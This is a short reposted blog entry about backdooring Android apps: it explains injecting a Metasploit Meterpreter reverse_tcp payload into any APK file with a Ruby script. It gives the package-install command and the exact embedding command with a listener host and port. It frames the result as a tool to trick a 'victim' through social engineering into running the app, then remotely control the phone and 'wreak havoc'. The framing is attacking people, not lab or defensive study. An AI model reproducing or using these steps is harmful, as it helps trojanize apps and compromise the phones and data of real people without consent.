android exploit metasploit,embed metasploit payload apk file

In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is, it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.

Usage

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Choose any apk file

Download apk-embed-payload.rb ruby script

Open a terminal, and type the following command

ruby apk-embed-payload.rb app_file.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=1337

DEMO

The post How to automatic inject backdoor to Android APK file and get shell appeared first on Penetration Testing in Linux. http://ift.tt/2qZ5HRy http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s